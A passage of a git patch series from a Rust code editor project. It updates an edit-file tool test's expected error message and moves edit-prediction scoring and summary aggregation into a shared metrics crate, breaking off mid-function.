end_line: None, + }), + ToolCallEventStream::test().0, + cx, + ) + }) + .await + .unwrap(); + + cx.background_executor + .advance_clock(std::time::Duration::from_secs(2)); + fs.save( + path!("/root/test.txt").as_ref(), + &"externally modified content".into(), + language::LineEnding::Unix, + ) + .await + .unwrap(); + + let project_path = project + .read_with(cx, |project, cx| { + project.find_project_path("root/test.txt", 
cx) + }) + .expect("Should find project path"); + let buffer = project + .update(cx, |project, cx| project.open_buffer(project_path, cx)) + .await + .unwrap(); + buffer + .update(cx, |buffer, cx| buffer.reload(cx)) + .await + .unwrap(); + + cx.executor().run_until_parked(); + + let result = cx + .update(|cx| { + tool.clone().run( + ToolInput::resolved(StreamingEditFileToolInput { + display_description: "Edit after external change".into(), + path: "root/test.txt".into(), + mode: StreamingEditFileMode::Edit, + content: None, + edits: Some(vec![Edit { + old_text: "original content".into(), + new_text: "new content".into(), + }]), + }), + ToolCallEventStream::test().0, + cx, + ) + }) .await; let StreamingEditFileToolOutput::Error { @@ -3398,12 +3495,15 @@ mod tests { }; assert!( - error.contains("has been modified since you last read it"), - "Error should mention file modification, got: {}", - error + error.contains("Could not find matching text for edit at index 0"), + "Error should mention failed match, got: {error}" + ); + assert!( + error.contains("has changed on disk since you last read it"), + "Error should mention possible disk change, got: {error}" ); assert!(diff.is_empty()); - assert!(input_path.is_none()); + assert_eq!(input_path, Some(PathBuf::from("root/test.txt"))); } #[gpui::test] From 3d5b9a17bece1f1b535edb77c16592617a894561 Mon Sep 17 00:00:00 2001 From: Oleksiy Syvokon Date: Mon, 4 May 2026 12:53:36 +0300 Subject: [PATCH 150/231] ep: Move scores aggegation to edit_prediction_metrics (#55609) This way, it can be shared with Python bindings. 
Release Notes: - N/A --- crates/edit_prediction_cli/src/example.rs | 70 +-- crates/edit_prediction_cli/src/main.rs | 1 - crates/edit_prediction_cli/src/metrics.rs | 10 +- .../src/reversal_tracking.rs | 17 - crates/edit_prediction_cli/src/score.rs | 525 ++---------------- .../src/edit_prediction_metrics.rs | 7 + .../src/prediction_score.rs | 319 +++++++++++ crates/edit_prediction_metrics/src/summary.rs | 293 ++++++++++ 8 files changed, 674 insertions(+), 568 deletions(-) delete mode 100644 crates/edit_prediction_cli/src/reversal_tracking.rs create mode 100644 crates/edit_prediction_metrics/src/prediction_score.rs create mode 100644 crates/edit_prediction_metrics/src/summary.rs diff --git a/crates/edit_prediction_cli/src/example.rs b/crates/edit_prediction_cli/src/example.rs index 516f77ce2cbe61..0b5a75260fcf1a 100644 --- a/crates/edit_prediction_cli/src/example.rs +++ b/crates/edit_prediction_cli/src/example.rs @@ -1,5 +1,4 @@ use crate::PredictionProvider; -use crate::metrics::ClassificationMetrics; use crate::paths::WORKTREES_DIR; use crate::qa::QaResult; use anyhow::{Context as _, Result}; @@ -149,74 +148,7 @@ where Ok(opt.unwrap_or_default()) } -#[derive(Clone, Debug, Serialize, Deserialize)] -pub struct ExampleScore { - pub delta_chr_f: f32, - #[serde(default)] - pub delta_chr_f_true_positives: usize, - #[serde(default)] - pub delta_chr_f_false_positives: usize, - #[serde(default)] - pub delta_chr_f_false_negatives: usize, - #[serde(default)] - pub delta_chr_f_precision: f64, - #[serde(default)] - pub delta_chr_f_recall: f64, - #[serde(default)] - pub delta_chr_f_beta: f64, - pub braces_disbalance: usize, - #[serde(default)] - pub exact_lines_tp: usize, - #[serde(default)] - pub exact_lines_fp: usize, - #[serde(default)] - pub exact_lines_fn: usize, - #[serde(default)] - pub reversal_ratio: f32, - #[serde(default, skip_serializing_if = "Option::is_none")] - pub cursor_distance: Option, - #[serde(default, skip_serializing_if = "Option::is_none")] - pub 
cursor_exact_match: Option, - pub wrong_editable_region: Option, - #[serde(default)] - pub has_isolated_whitespace_changes: bool, - #[serde(default)] - pub inserted_tokens: usize, - #[serde(default)] - pub deleted_tokens: usize, - #[serde(default, skip_serializing_if = "Option::is_none")] - pub kept_rate: Option, - #[serde(default, skip_serializing_if = "Option::is_none")] - pub recall_rate: Option, - #[serde(default, skip_serializing_if = "Option::is_none")] - pub kept_chars: Option, - #[serde(default, skip_serializing_if = "Option::is_none")] - pub correctly_deleted_chars: Option, - #[serde(default, skip_serializing_if = "Option::is_none")] - pub discarded_chars: Option, - #[serde(default, skip_serializing_if = "Option::is_none")] - pub cumulative_logprob: Option, - #[serde(default, skip_serializing_if = "Option::is_none")] - pub avg_logprob: Option, -} - -impl ExampleScore { - pub fn delta_chr_f_counts(&self) -> ClassificationMetrics { - ClassificationMetrics { - true_positives: self.delta_chr_f_true_positives, - false_positives: self.delta_chr_f_false_positives, - false_negatives: self.delta_chr_f_false_negatives, - } - } - - pub fn exact_lines_counts(&self) -> ClassificationMetrics { - ClassificationMetrics { - true_positives: self.exact_lines_tp, - false_positives: self.exact_lines_fp, - false_negatives: self.exact_lines_fn, - } - } -} +pub type ExampleScore = edit_prediction_metrics::PredictionScore; impl Example { pub fn repo_name(&self) -> Result> { diff --git a/crates/edit_prediction_cli/src/main.rs b/crates/edit_prediction_cli/src/main.rs index 0ab16690e6c8ae..e15a65a5980166 100644 --- a/crates/edit_prediction_cli/src/main.rs +++ b/crates/edit_prediction_cli/src/main.rs @@ -19,7 +19,6 @@ mod qa; mod reorder_patch; mod repair; mod retrieve_context; -mod reversal_tracking; mod score; mod split_commit; mod split_dataset; diff --git a/crates/edit_prediction_cli/src/metrics.rs b/crates/edit_prediction_cli/src/metrics.rs index 916d1498e6e1ae..4bb8f22e2de694 
100644 --- a/crates/edit_prediction_cli/src/metrics.rs +++ b/crates/edit_prediction_cli/src/metrics.rs @@ -1,7 +1,5 @@ #![allow(unused_imports)] -use crate::example::ActualCursor; - pub use edit_prediction_metrics::ClassificationMetrics; pub use edit_prediction_metrics::Counts; pub use edit_prediction_metrics::DeltaChrFMetrics; @@ -14,11 +12,5 @@ pub use edit_prediction_metrics::delta_chr_f; pub use edit_prediction_metrics::delta_chr_f_beta; pub use edit_prediction_metrics::exact_lines_match; pub use edit_prediction_metrics::extract_changed_lines_from_diff; +pub use edit_prediction_metrics::has_isolated_whitespace_changes; pub use edit_prediction_metrics::is_editable_region_correct; - -pub fn has_isolated_whitespace_changes(patch_str: &str, cursor: Option<&ActualCursor>) -> bool { - edit_prediction_metrics::has_isolated_whitespace_changes( - patch_str, - cursor.map(|cursor| cursor.row), - ) -} diff --git a/crates/edit_prediction_cli/src/reversal_tracking.rs b/crates/edit_prediction_cli/src/reversal_tracking.rs deleted file mode 100644 index 58d52ed84e6eb8..00000000000000 --- a/crates/edit_prediction_cli/src/reversal_tracking.rs +++ /dev/null @@ -1,17 +0,0 @@ -use std::path::Path; - -use zeta_prompt::ZetaPromptInput; - -pub fn compute_prediction_reversal_ratio( - prompt_inputs: &ZetaPromptInput, - predicted_content: &str, - cursor_path: &Path, -) -> f32 { - edit_prediction_metrics::compute_prediction_reversal_ratio_from_history( - prompt_inputs.cursor_excerpt.as_ref(), - &prompt_inputs.events, - prompt_inputs.excerpt_start_row, - predicted_content, - cursor_path, - ) -} diff --git a/crates/edit_prediction_cli/src/score.rs b/crates/edit_prediction_cli/src/score.rs index 5e7721e84f7892..48ce081f42942b 100644 --- a/crates/edit_prediction_cli/src/score.rs +++ b/crates/edit_prediction_cli/src/score.rs @@ -1,22 +1,21 @@ use crate::{ PredictArgs, PredictionProvider, - example::{ActualCursor, Example, ExampleScore}, + example::Example, format_prompt::TeacherPrompt, 
headless::EpAppState, - metrics, parse_output::parse_prediction_output, predict::run_prediction, progress::{ExampleProgress, Step}, - reversal_tracking, }; use anyhow::Context as _; +use edit_prediction_metrics::{ + ActualPredictionCursor, PredictionReversalContext, PredictionScoringInput, +}; use gpui::AsyncApp; -use serde::Serialize; use std::fs::File; use std::io::BufWriter; use std::path::Path; use std::sync::Arc; -use zeta_prompt::udiff::{apply_diff_to_string, apply_diff_to_string_with_hunk_offset}; pub async fn run_scoring( example: &mut Example, @@ -37,18 +36,6 @@ pub async fn run_scoring( let original_text: &str = prompt_inputs.cursor_excerpt.as_ref(); let expected_patches_with_cursors = example.spec.expected_patches_with_cursor_positions(); - let expected_texts: Vec = expected_patches_with_cursors - .iter() - .map(|(patch, _)| { - apply_diff_to_string(patch, original_text) - .with_context(|| format!("Expected patch did not apply for {}", example.spec.name)) - }) - .collect::, _>>()?; - - // For Teacher prompts, we need to extract the editable region to properly compute cursor offsets. - // The actual_cursor_offset from Teacher is relative to the editable region, while the expected - // cursor from the patch is relative to the hunk. We need to apply the patch to the editable - // region to find where the hunk matched, then compute the expected cursor position. 
let old_editable_region = if let Some(p) = example.prompt.as_ref() { if matches!( p.provider, @@ -65,33 +52,12 @@ pub async fn run_scoring( None }; - let zero_scores = ExampleScore { - delta_chr_f: 0.0, - delta_chr_f_true_positives: 0, - delta_chr_f_false_positives: 0, - delta_chr_f_false_negatives: 0, - delta_chr_f_precision: 0.0, - delta_chr_f_recall: 0.0, - delta_chr_f_beta: metrics::delta_chr_f_beta(), - braces_disbalance: 0, - exact_lines_tp: 0, - exact_lines_fp: 0, - exact_lines_fn: 0, - reversal_ratio: 0.0, - cursor_distance: None, - cursor_exact_match: None, - wrong_editable_region: None, - has_isolated_whitespace_changes: false, - inserted_tokens: 0, - deleted_tokens: 0, - kept_rate: None, - recall_rate: None, - kept_chars: None, - correctly_deleted_chars: None, - discarded_chars: None, - cumulative_logprob: None, - avg_logprob: None, - }; + let prepared_expected_patches = edit_prediction_metrics::prepare_expected_patches( + &expected_patches_with_cursors, + original_text, + old_editable_region.as_deref(), + ) + .with_context(|| format!("Expected patch did not apply for {}", example.spec.name))?; let cursor_path = example.spec.cursor_path.as_ref(); @@ -104,162 +70,36 @@ pub async fn run_scoring( .map(|(patch, _)| patch) }); - let Some(actual_patch) = actual_patch else { - scores.push(zero_scores.clone()); - continue; - }; - - let token_changes = metrics::count_patch_token_changes(&actual_patch); - - let actual_text = match apply_diff_to_string(&actual_patch, original_text) { - Ok(text) => text, - Err(_) => { - let mut s = zero_scores.clone(); - s.inserted_tokens = token_changes.inserted_tokens; - s.deleted_tokens = token_changes.deleted_tokens; - scores.push(s); - continue; - } - }; - - let mut best_delta_chr_f_metrics = metrics::DeltaChrFMetrics::default(); - let mut best_expected_cursor: Option = None; - let mut best_patch_idx: Option = None; - let mut best_expected_text: Option<&str> = None; - - for (idx, expected) in expected_texts.iter().enumerate() { 
- let delta_chr_f_metrics = metrics::delta_chr_f(original_text, expected, &actual_text); - if delta_chr_f_metrics.score > best_delta_chr_f_metrics.score { - best_delta_chr_f_metrics = delta_chr_f_metrics; - best_patch_idx = Some(idx); - best_expected_text = Some(expected); - } - } - - if let Some(idx) = best_patch_idx { - // Get the raw cursor offset from the expected patch (relative to hunk new text) - let expected_cursor_in_patch = expected_patches_with_cursors - .get(idx) - .and_then(|(_, cursor)| *cursor); - - // For Teacher prompts, we need to apply the patch to the editable region - // to find where the hunk matched, then compute the actual cursor position - if let (Some(editable_region), Some(cursor_in_patch)) = - (&old_editable_region, expected_cursor_in_patch) - { - let (patch, _) = &expected_patches_with_cursors[idx]; - if let Ok((_, hunk_offset)) = - apply_diff_to_string_with_hunk_offset(patch, editable_region) - { - let hunk_start = hunk_offset.unwrap_or(0); - best_expected_cursor = Some(hunk_start + cursor_in_patch); - } - } else { - // For non-Teacher prompts or if we can't compute, use raw offset - best_expected_cursor = expected_cursor_in_patch; - } - } - - let disbalance_before = metrics::braces_disbalance(&original_text); - let disbalance_after = metrics::braces_disbalance(&actual_text); - let braces_disbalance = disbalance_after.saturating_sub(disbalance_before); - - // Compute exact lines match against best matching expected patch - let best_exact_lines = expected_patches_with_cursors - .iter() - .map(|(expected_patch, _)| metrics::exact_lines_match(expected_patch, &actual_patch)) - .max_by_key(|m| m.true_positives) - .unwrap_or_default(); - - // Compute reversal ratio - let reversal_ratio = reversal_tracking::compute_prediction_reversal_ratio( - prompt_inputs, - &actual_text, - cursor_path, - ); - - // Compute cursor position metrics - let (cursor_distance, cursor_exact_match) = - compute_cursor_metrics(best_expected_cursor, 
prediction.actual_cursor.as_ref()); - - // Compute approximation of editable region correctness - let wrong_editable_region = Some(!metrics::is_editable_region_correct(&actual_patch)); - - // Check for isolated whitespace changes. - let has_isolated_whitespace_changes = metrics::has_isolated_whitespace_changes( - &actual_patch, - prediction.actual_cursor.as_ref(), - ); - - let (kept_rate, recall_rate, kept_chars, correctly_deleted_chars, discarded_chars) = - best_expected_text - .map(|reference_text| { - let result = - metrics::compute_kept_rate(original_text, &actual_text, reference_text); - ( - Some(result.kept_rate), - Some(result.recall_rate), - Some(result.kept_chars), - Some(result.correctly_deleted_chars), - Some(result.discarded_chars), - ) - }) - .unwrap_or((None, None, None, None, None)); - - scores.push(ExampleScore { - delta_chr_f: best_delta_chr_f_metrics.score as f32, - delta_chr_f_true_positives: best_delta_chr_f_metrics.counts.true_positives, - delta_chr_f_false_positives: best_delta_chr_f_metrics.counts.false_positives, - delta_chr_f_false_negatives: best_delta_chr_f_metrics.counts.false_negatives, - delta_chr_f_precision: best_delta_chr_f_metrics.precision, - delta_chr_f_recall: best_delta_chr_f_metrics.recall, - delta_chr_f_beta: best_delta_chr_f_metrics.beta, - braces_disbalance, - exact_lines_tp: best_exact_lines.true_positives, - exact_lines_fp: best_exact_lines.false_positives, - exact_lines_fn: best_exact_lines.false_negatives, - reversal_ratio, - cursor_distance, - cursor_exact_match, - wrong_editable_region, - has_isolated_whitespace_changes, - inserted_tokens: token_changes.inserted_tokens, - deleted_tokens: token_changes.deleted_tokens, - kept_rate, - recall_rate, - kept_chars, - correctly_deleted_chars, - discarded_chars, - cumulative_logprob: prediction.cumulative_logprob, - avg_logprob: prediction.avg_logprob, - }); + let actual_cursor = + prediction + .actual_cursor + .as_ref() + .map(|cursor| ActualPredictionCursor { + row: 
cursor.row, + editable_region_offset: cursor.editable_region_offset, + }); + + scores.push(edit_prediction_metrics::score_prediction( + PredictionScoringInput { + original_text, + expected_patches: &prepared_expected_patches, + actual_patch: actual_patch.as_deref(), + actual_cursor, + reversal_context: Some(PredictionReversalContext { + edit_history: &prompt_inputs.events, + excerpt_start_row: prompt_inputs.excerpt_start_row, + cursor_path, + }), + cumulative_logprob: prediction.cumulative_logprob, + avg_logprob: prediction.avg_logprob, + }, + )); } example.score = scores; Ok(()) } -fn compute_cursor_metrics( - expected_cursor_editable_region_offset: Option, - actual_cursor: Option<&ActualCursor>, -) -> (Option, Option) { - match (expected_cursor_editable_region_offset, actual_cursor) { - (Some(expected), Some(actual)) => { - let distance = expected.abs_diff(actual.editable_region_offset.unwrap_or_default()); - let exact_match = distance == 0; - (Some(distance), Some(exact_match)) - } - (None, None) => { - // Neither has cursor position - skip cursor scoring - (None, None) - } - (Some(_), None) | (None, Some(_)) => { - // Only one has cursor position - count as miss - (None, Some(false)) - } - } -} - pub fn print_report(examples: &[Example], verbose: bool) { const MAX_EXAMPLES_DEFAULT: usize = 20; use crate::metrics::ClassificationMetrics; @@ -633,286 +473,27 @@ fn truncate_name(name: &str, max_len: usize) -> String { } } -#[derive(Serialize)] -pub struct SummaryJson { - pub total_examples: usize, - pub avg_delta_chr_f: f32, - pub delta_chr_f_beta: f64, - pub delta_chr_f_true_positives: usize, - pub delta_chr_f_false_positives: usize, - pub delta_chr_f_false_negatives: usize, - pub delta_chr_f_precision: f64, - pub delta_chr_f_recall: f64, - pub avg_braces_disbalance: f32, - pub exact_lines_true_positives: usize, - pub exact_lines_false_positives: usize, - pub exact_lines_false_negatives: usize, - pub exact_lines_precision: f64, - pub exact_lines_recall: f64, - pub 
exact_lines_f1: f64, - pub avg_reversal_ratio: f32, - #[serde(skip_serializing_if = "Option::is_none")] - pub qa_avg_reverts_edits: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub qa_avg_confidence: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub cursor_exact_match_rate: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub cursor_avg_distance: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub cursor_total_evaluated: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub wrong_editable_region_rate: Option, - pub isolated_whitespace_rate: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub avg_kept_rate: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub avg_recall_rate: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub total_kept_chars: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub total_correctly_deleted_chars: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub total_discarded_chars: Option, -} +pub type SummaryJson = edit_prediction_metrics::SummaryJson; pub fn compute_summary(examples: &[Example]) -> SummaryJson { - use crate::metrics::ClassificationMetrics; - - let mut all_delta_chr_f_scores = Vec::new(); - let mut all_reversal_ratios = Vec::new(); - let mut braces_disbalance_sum: usize = 0; - let mut total_delta_chr_f = ClassificationMetrics::default(); - let mut total_delta_chr_f_precision = 0.0; - let mut total_delta_chr_f_recall = 0.0; - let mut delta_chr_f_beta = 0.0; - let mut total_exact_lines = ClassificationMetrics::default(); - let mut total_scores: usize = 0; - let mut qa_reverts_count: usize = 0; - let mut qa_reverts_total: usize = 0; - let mut qa_confidence_sum: u64 = 0; - let mut qa_confidence_count: usize = 0; - let mut cursor_exact_matches: usize = 0; - let mut cursor_total: usize = 0; - let mut cursor_distance_sum: usize = 0; - let mut cursor_distance_count: usize = 0; - let mut 
wrong_editable_region_count: usize = 0; - let mut wrong_editable_region_total: usize = 0; - let mut isolated_whitespace_count: usize = 0; - let mut kept_rate_sum: f64 = 0.0; - let mut kept_rate_count: usize = 0; - let mut kept_chars_total: usize = 0; - let mut kept_chars_count: usize = 0; - let mut correctly_deleted_chars_total: usize = 0; - let mut correctly_deleted_chars_count: usize = 0; - let mut discarded_chars_total: usize = 0; - let mut discarded_chars_count: usize = 0; - let mut recall_rate_sum: f64 = 0.0; - let mut recall_rate_count: usize = 0; - - for example in examples { - for (score_idx, score) in example.score.iter().enumerate() { - all_delta_chr_f_scores.push(score.delta_chr_f); - all_reversal_ratios.push(score.reversal_ratio); - total_scores += 1; - braces_disbalance_sum += score.braces_disbalance; - total_delta_chr_f.accumulate(&score.delta_chr_f_counts()); - total_delta_chr_f_precision += score.delta_chr_f_precision; - total_delta_chr_f_recall += score.delta_chr_f_recall; - delta_chr_f_beta = score.delta_chr_f_beta; - total_exact_lines.accumulate(&score.exact_lines_counts()); - - // Accumulate QA metrics - if let Some(Some(qa)) = example.qa.get(score_idx) { - if let Some(reverts) = qa.reverts_edits { - qa_reverts_total += 1; - if reverts { - qa_reverts_count += 1; - } - } - if let Some(conf) = qa.confidence { - qa_confidence_sum += conf as u64; - qa_confidence_count += 1; - } - } - - // Accumulate wrong editable region metrics - if let Some(wrong) = score.wrong_editable_region { - wrong_editable_region_total += 1; - if wrong { - wrong_editable_region_count += 1; - } - } - - // Accumulate isolated whitespace metrics - if score.has_isolated_whitespace_changes { - isolated_whitespace_count += 1; - } - - // Accumulate kept and recall rate metrics - if let Some(kr) = score.kept_rate { - kept_rate_sum += kr; - kept_rate_count += 1; - } - if let Some(kept_chars) = score.kept_chars { - kept_chars_total += kept_chars; - kept_chars_count += 1; - } - if let 
Some(correctly_deleted_chars) = score.correctly_deleted_chars { - correctly_deleted_chars_total += correctly_deleted_chars; - correctly_deleted_chars_count += 1; - } - if let Some(discarded_chars) = score.discarded_chars { - discarded_chars_total += discarded_chars; - discarded_chars_count += 1; - } - if let Some(rr) = score.recall_rate { - recall_rate_sum += rr; - recall_rate_count += 1; - } - - // Accumulate cursor metrics - if let Some(exact_match) = score.cursor_exact_match { - cursor_total += 1; - if exact_match { - cursor_exact_matches += 1; - } - } - if let Some(dist) = score.cursor_distance { - cursor_distance_sum += dist; - cursor_distance_count += 1; - } - } - } - - let avg_delta_chr_f = if all_delta_chr_f_scores.is_empty() { - 0.0 - } else { - all_delta_chr_f_scores.iter().sum::() / all_delta_chr_f_scores.len() as f32 - }; - - let avg_reversal_ratio = if all_reversal_ratios.is_empty() { - 0.0 - } else { - all_reversal_ratios.iter().sum::() / all_reversal_ratios.len() as f32 - }; - - let avg_braces_disbalance = if total_scores == 0 { - 0.0 - } else { - braces_disbalance_sum as f32 / total_scores as f32 - }; - - let qa_avg_reverts_edits = if qa_reverts_total > 0 { - Some(qa_reverts_count as f32 / qa_reverts_total as f32) - } else { - None - }; - - let qa_avg_confidence = if qa_confidence_count > 0 { - Some(qa_confidence_sum as f32 / qa_confidence_count as f32) - } else { - None - }; - - let cursor_exact_match_rate = if cursor_total > 0 { - Some(cursor_exact_matches as f32 / cursor_total as f32) - } else { - None - }; - - let cursor_avg_distance = if cursor_distance_count > 0 { - Some(cursor_distance_sum as f32 / cursor_distance_count as f32) - } else { - None - }; - - let cursor_total_evaluated = if cursor_total > 0 { - Some(cursor_total) - } else { - None - }; - - let wrong_editable_region_rate = if wrong_editable_region_total > 0 { - Some(wrong_editable_region_count as f32 / wrong_editable_region_total as f32) - } else { - None - }; - - let 
isolated_whitespace_rate = if total_scores > 0 { - Some(isolated_whitespace_count as f32 / total_scores as f32) - } else { - None - }; - - let avg_kept_rate = if kept_rate_count > 0 { - Some(kept_rate_sum / kept_rate_count as f64) - } else { - None - }; - - let avg_recall_rate = if recall_rate_count > 0 { - Some(recall_rate_sum / recall_rate_count as f64) - } else { - None - }; - - let total_kept_chars = if kept_chars_count > 0 { - Some(kept_chars_total) - } else { - None - }; - - let total_correctly_deleted_chars = if correctly_deleted_chars_count > 0 { - Some(correctly_deleted_chars_total) - } else { - None - }; - - let total_discarded_chars = if discarded_chars_count > 0 { - Some(discarded_chars_total) - } else { - None - }; - - SummaryJson { - total_examples: total_scores, - avg_delta_chr_f, - delta_chr_f_beta, - delta_chr_f_true_positives: total_delta_chr_f.true_positives, - delta_chr_f_false_positives: total_delta_chr_f.false_positives, - delta_chr_f_false_negatives: total_delta_chr_f.false_negatives, - delta_chr_f_precision: if total_scores == 0 { - 0.0 - } else { - total_delta_chr_f_precision / total_scores as f64 - }, - delta_chr_f_recall: if total_scores == 0 { - 0.0 - } else { - total_delta_chr_f_recall / total_scores as f64 - }, - avg_braces_disbalance, - exact_lines_true_positives: total_exact_lines.true_positives, - exact_lines_false_positives: total_exact_lines.false_positives, - exact_lines_false_negatives: total_exact_lines.false_negatives, - exact_lines_precision: total_exact_lines.precision(), - exact_lines_recall: total_exact_lines.recall(), - exact_lines_f1: total_exact_lines.f1(), - avg_reversal_ratio, - qa_avg_reverts_edits, - qa_avg_confidence, - cursor_exact_match_rate, - cursor_avg_distance, - cursor_total_evaluated, - wrong_editable_region_rate, - isolated_whitespace_rate, - avg_kept_rate, - avg_recall_rate, - total_kept_chars, - total_correctly_deleted_chars, - total_discarded_chars, - } + 
edit_prediction_metrics::compute_summary(examples.iter().flat_map(|example| { + example + .score + .iter() + .enumerate() + .map(move |(score_idx, score)| { + let qa = example + .qa + .get(score_idx) + .and_then(|qa| qa.as_ref()) + .map(|qa| edit_prediction_metrics::QaSummaryData { + reverts_edits: qa.reverts_edits, + confidence: qa.confidence, + }); + + edit_prediction_metrics::PredictionSummaryInput { score, qa } + }) + })) } pub fn write_summary_json(examples: &[Example], path: &Path) -> anyhow::Result<()> { diff --git a/crates/edit_prediction_metrics/src/edit_prediction_metrics.rs b/crates/edit_prediction_metrics/src/edit_prediction_metrics.rs index 3afe02fd083076..74ad639b7e9773 100644 --- a/crates/edit_prediction_metrics/src/edit_prediction_metrics.rs +++ b/crates/edit_prediction_metrics/src/edit_prediction_metrics.rs @@ -1,6 +1,8 @@ mod kept_rate; mod patch_metrics; +mod prediction_score; mod reversal; +mod summary; mod tokenize; mod tree_sitter; @@ -22,5 +24,10 @@ pub use patch_metrics::extract_changed_lines_from_diff; pub use patch_metrics::has_isolated_whitespace_changes; pub use patch_metrics::is_editable_region_correct; pub use patch_metrics::reconstruct_texts_from_diff; +pub use prediction_score::{ + ActualPredictionCursor, PredictionReversalContext, PredictionScore, PredictionScoringInput, + PrepareExpectedPatchError, PreparedExpectedPatch, prepare_expected_patches, score_prediction, +}; pub use reversal::compute_prediction_reversal_ratio_from_history; +pub use summary::{PredictionSummaryInput, QaSummaryData, SummaryJson, compute_summary}; pub use tree_sitter::count_tree_sitter_errors; diff --git a/crates/edit_prediction_metrics/src/prediction_score.rs b/crates/edit_prediction_metrics/src/prediction_score.rs new file mode 100644 index 00000000000000..55c1d828762dd0 --- /dev/null +++ b/crates/edit_prediction_metrics/src/prediction_score.rs @@ -0,0 +1,319 @@ +use serde::{Deserialize, Serialize}; +use std::error::Error; +use std::fmt; +use 
std::path::Path; +use std::sync::Arc; +use zeta_prompt::udiff::{apply_diff_to_string, apply_diff_to_string_with_hunk_offset}; + +use crate::patch_metrics::{ + ClassificationMetrics, DeltaChrFMetrics, braces_disbalance, count_patch_token_changes, + delta_chr_f, delta_chr_f_beta, exact_lines_match, has_isolated_whitespace_changes, + is_editable_region_correct, +}; +use crate::reversal::compute_prediction_reversal_ratio_from_history; + +#[derive(Clone, Debug, Serialize, Deserialize)] +pub struct PredictionScore { + pub delta_chr_f: f32, + #[serde(default)] + pub delta_chr_f_true_positives: usize, + #[serde(default)] + pub delta_chr_f_false_positives: usize, + #[serde(default)] + pub delta_chr_f_false_negatives: usize, + #[serde(default)] + pub delta_chr_f_precision: f64, + #[serde(default)] + pub delta_chr_f_recall: f64, + #[serde(default)] + pub delta_chr_f_beta: f64, + pub braces_disbalance: usize, + #[serde(default)] + pub exact_lines_tp: usize, + #[serde(default)] + pub exact_lines_fp: usize, + #[serde(default)] + pub exact_lines_fn: usize, + #[serde(default)] + pub reversal_ratio: f32, + #[serde(default, skip_serializing_if = "Option::is_none")] + pub cursor_distance: Option, + #[serde(default, skip_serializing_if = "Option::is_none")] + pub cursor_exact_match: Option, + pub wrong_editable_region: Option, + #[serde(default)] + pub has_isolated_whitespace_changes: bool, + #[serde(default)] + pub inserted_tokens: usize, + #[serde(default)] + pub deleted_tokens: usize, + #[serde(default, skip_serializing_if = "Option::is_none")] + pub kept_rate: Option, + #[serde(default, skip_serializing_if = "Option::is_none")] + pub recall_rate: Option, + #[serde(default, skip_serializing_if = "Option::is_none")] + pub kept_chars: Option, + #[serde(default, skip_serializing_if = "Option::is_none")] + pub correctly_deleted_chars: Option, + #[serde(default, skip_serializing_if = "Option::is_none")] + pub discarded_chars: Option, + #[serde(default, skip_serializing_if = 
"Option::is_none")] + pub cumulative_logprob: Option, + #[serde(default, skip_serializing_if = "Option::is_none")] + pub avg_logprob: Option, +} + +impl PredictionScore { + pub fn zero() -> Self { + Self { + delta_chr_f: 0.0, + delta_chr_f_true_positives: 0, + delta_chr_f_false_positives: 0, + delta_chr_f_false_negatives: 0, + delta_chr_f_precision: 0.0, + delta_chr_f_recall: 0.0, + delta_chr_f_beta: delta_chr_f_beta(), + braces_disbalance: 0, + exact_lines_tp: 0, + exact_lines_fp: 0, + exact_lines_fn: 0, + reversal_ratio: 0.0, + cursor_distance: None, + cursor_exact_match: None, + wrong_editable_region: None, + has_isolated_whitespace_changes: false, + inserted_tokens: 0, + deleted_tokens: 0, + kept_rate: None, + recall_rate: None, + kept_chars: None, + correctly_deleted_chars: None, + discarded_chars: None, + cumulative_logprob: None, + avg_logprob: None, + } + } + + pub fn delta_chr_f_counts(&self) -> ClassificationMetrics { + ClassificationMetrics { + true_positives: self.delta_chr_f_true_positives, + false_positives: self.delta_chr_f_false_positives, + false_negatives: self.delta_chr_f_false_negatives, + } + } + + pub fn exact_lines_counts(&self) -> ClassificationMetrics { + ClassificationMetrics { + true_positives: self.exact_lines_tp, + false_positives: self.exact_lines_fp, + false_negatives: self.exact_lines_fn, + } + } +} + +impl Default for PredictionScore { + fn default() -> Self { + Self::zero() + } +} + +#[derive(Clone, Debug)] +pub struct PreparedExpectedPatch { + pub patch: String, + pub text: String, + pub cursor_editable_region_offset: Option, +} + +#[derive(Clone, Debug)] +pub struct PrepareExpectedPatchError { + message: String, +} + +impl fmt::Display for PrepareExpectedPatchError { + fn fmt(&self, formatter: &mut fmt::Formatter<'_>) -> fmt::Result { + self.message.fmt(formatter) + } +} + +impl Error for PrepareExpectedPatchError {} + +pub fn prepare_expected_patches( + expected_patches_with_cursors: &[(String, Option)], + original_text: &str, + 
old_editable_region: Option<&str>, +) -> Result, PrepareExpectedPatchError> { + expected_patches_with_cursors + .iter() + .map(|(patch, cursor_in_patch)| { + let text = apply_diff_to_string(patch, original_text).map_err(|error| { + PrepareExpectedPatchError { + message: error.to_string(), + } + })?; + let cursor_editable_region_offset = + if let (Some(editable_region), Some(cursor_in_patch)) = + (old_editable_region, *cursor_in_patch) + { + match apply_diff_to_string_with_hunk_offset(patch, editable_region) { + Ok((_, hunk_offset)) => Some(hunk_offset.unwrap_or(0) + cursor_in_patch), + Err(_) => None, + } + } else { + *cursor_in_patch + }; + + Ok(PreparedExpectedPatch { + patch: patch.clone(), + text, + cursor_editable_region_offset, + }) + }) + .collect() +} + +#[derive(Clone, Copy, Debug)] +pub struct ActualPredictionCursor { + pub row: u32, + pub editable_region_offset: Option, +} + +#[derive(Clone, Copy, Debug)] +pub struct PredictionReversalContext<'a> { + pub edit_history: &'a [Arc], + pub excerpt_start_row: Option, + pub cursor_path: &'a Path, +} + +#[derive(Clone, Copy, Debug)] +pub struct PredictionScoringInput<'a> { + pub original_text: &'a str, + pub expected_patches: &'a [PreparedExpectedPatch], + pub actual_patch: Option<&'a str>, + pub actual_cursor: Option, + pub reversal_context: Option>, + pub cumulative_logprob: Option, + pub avg_logprob: Option, +} + +pub fn score_prediction(input: PredictionScoringInput<'_>) -> PredictionScore { + let Some(actual_patch) = input.actual_patch else { + return PredictionScore::zero(); + }; + + let token_changes = count_patch_token_changes(actual_patch); + + let actual_text = 